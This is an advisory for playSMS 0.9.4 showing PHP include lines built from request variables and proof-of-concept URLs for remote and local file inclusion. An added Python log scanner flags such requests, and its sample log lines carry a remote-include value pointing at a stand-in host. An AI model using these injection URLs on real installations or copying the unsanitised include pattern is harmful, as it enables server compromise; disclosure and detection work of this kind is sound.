[o]====================================[o]
[x] playSMS version 0.9.4 [x]
[x] RFI&LFI Vulnerability [x]
Download: http://playsms.sourceforge.net/ (167.9 KB)
Date : 14 Oct 2009
[o]====================================[o]
file: /lib/function.php
// main functions
include "$apps_path[libs]/fn_logger.php"; // line 4
include "$apps_path[libs]/fn_auth.php"; // line 5
include "$apps_path[libs]/fn_user.php"; // line 6
include "$apps_path[libs]/fn_sendsms.php"; // line 7
include "$apps_path[libs]/fn_sendmail.php"; // line 8
include "$apps_path[libs]/fn_phonebook.php"; // line 9
include "$apps_path[libs]/fn_core.php"; // line 10
include "$apps_path[libs]/fn_themes.php"; // line 11
// init global variables
include "$apps_path[libs]/lib_init1.php"; // line 14
// custom functions before plugins loading
include "$apps_path[libs]/fn_custom1.php"; // line 17
// init global variables
include "$apps_path[libs]/lib_init2.php"; // line 65
// custom functions before plugins loading
include "$apps_path[libs]/fn_custom2.php"; // line 68
http://localhost/[path]/lib/function.php?apps_path[libs]=[tutung-RFI]
[o]====================================[o]
file: /plugin/themes/default/init.php
include $apps_path[themes]."/".$themes_module."/config.php";
include $apps_path[themes]."/".$themes_module."/fn.php"; // line 3
http://localhost/[path]/plugin/themes/default/init.php?apps_path[themes]=[tutung-RFI]
http://localhost/[path]/plugin/themes/default/init.php?themes_module=[tutung-LFI]
[o]====================================[o]
file: /plugin/gateway/gnokii/init.php
include "$apps_path[plug]/gateway/$gateway_module/config.php"; // line 2
include "$apps_path[plug]/gateway/$gateway_module/fn.php"; // line 3
http://localhost/[path]/plugin/gateway/gnokii/init.php?apps_path[plug]=[tutung-RFI]
http://localhost/[path]/plugin/gateway/gnokii/init.php?gateway_module=[tutung-LFI]
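Added example (not part of the original advisory, not playSMS code): a log check for the pattern shown above, where one of the three include fragments is requested directly with its include-path variable set in the query string. The access-log format, the /playsms/ prefix, the sample lines and the three labels are assumptions made for this sketch.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and include-path variables named in the advisory.
WATCHED = {
    "/lib/function.php": {"apps_path[libs]"},
    "/plugin/themes/default/init.php": {"apps_path[themes]", "themes_module"},
    "/plugin/gateway/gnokii/init.php": {"apps_path[plug]", "gateway_module"},
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)


def classify(value):
    """Label a parameter value (labels are this sketch's own naming)."""
    if REMOTE_RE.match(value):
        return "remote-include"      # value is a URL with a scheme
    if ".." in value or value.startswith("/"):
        return "local-include"       # value walks to another local path
    return "variable-override"       # variable set from outside at all


def scan(lines):
    """Return (line_no, script, parameter, label) for each suspicious request."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        for script, params in WATCHED.items():
            if not url.path.endswith(script):
                continue
            # parse_qsl percent-decodes, so apps_path%5Blibs%5D is matched too.
            for name, value in parse_qsl(url.query, keep_blank_values=True):
                if name in params:
                    hits.append((no, script, name, classify(value)))
    return hits


# Constructed sample access-log lines (not real traffic).
SAMPLE = [
    '192.0.2.10 - - [15/Oct/2009:18:54:01 +0700] "GET /playsms/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [15/Oct/2009:18:54:07 +0700] "GET /playsms/lib/function.php?apps_path%5Blibs%5D=http://host.example/ HTTP/1.1" 200 312',
    '192.0.2.44 - - [15/Oct/2009:18:54:09 +0700] "GET /playsms/plugin/themes/default/init.php?themes_module=../../PLACEHOLDER HTTP/1.1" 200 0',
    '192.0.2.44 - - [15/Oct/2009:18:54:12 +0700] "GET /playsms/plugin/gateway/gnokii/init.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Any hit is worth a look, because these files are include fragments and normal use of the application does not pass them path variables in the URL.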
[o]====================================[o]
I think this bug was published by
ahmadbady [kivi_hacker666@yahoo.com] for playSMS version 0.9.3,
but the vendor still hasn't fixed the bug in playSMS version 0.9.4,
so it's not the same version, right? :D
A nudge (colek-colek) to:
All Brotha Antisecurity[dot]Org www.MainHack.net www.ServerIsDown.org
Jack-, Vrs_hCk, OoN_Boy, NoGe, zxvf, Yadoy666, s3t4n, r3v4n_b4st4rd,
pizzyroot, em|nem, s4va, kecemplungkalen, xr00tb0y
xshadow, Tante Angela Chang, IrcMafia
Indonesian Coder
Don Tukulesto, M3NW5, m364tr0n, cyb3r_tr0n
./noname
[o]====================================[o]
Thursday, October 15, 2009
playSMS ver 0.9.4 RFI & LFI Vulnerability
6:54 PM
matthews